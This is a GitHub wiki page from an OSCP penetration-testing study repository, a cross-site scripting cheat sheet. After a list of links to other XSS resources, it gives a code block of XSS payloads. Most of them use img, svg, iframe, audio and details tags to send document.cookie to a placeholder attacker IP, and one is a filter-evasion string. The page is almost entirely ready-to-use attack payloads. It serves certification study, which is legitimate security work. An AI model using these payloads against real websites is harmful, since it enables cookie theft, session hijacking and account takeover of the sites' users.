XSS - A1vinSmith/OSCP-PWK GitHub Wiki
- http://www.xss-payloads.com/
- https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
- https://owasp.org/www-community/xss-filter-evasion-cheatsheet
- http://seguretat.wiki.uoc.edu/index.php/XSS_Cheat_Sheet
- https://github.com/A1vinSmith/prompt-1-to-win-Solutions
Sometimes the filter treats specific tags differently, e.g. `<img>`.

```html
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<img src="valid-image.png" onload="fetch('http://192.168.XX.XX/?c=' + document.cookie)">
'onload='let x = new Image;x.src="http://192.168.XX.XX/?"+document.cookie'
'onerror='var a = new Image;a.src="http://192.168.XX.XX/?"+document.cookie'
<svg onload="fetch('http://192.168.XX.XX/?c=' + document.cookie)"></svg>
'onload="fetch('http://192.168.XX.XX/?c=' + document.cookie)"></svg>
<iframe src="javascript:fetch('http://192.168.XX.XX/?c=' + document.cookie)"></iframe>
<meta http-equiv="refresh" content="0; url=http://192.168.XX.XX/?c=' + document.cookie">
<audio src="x" onerror="fetch('http://192.168.XX.XX/?c=' + document.cookie)"></audio>
<details ontoggle="fetch('http://192.168.XX.XX/?c=' + document.cookie)">
<summary>Click me</summary>
</details>
```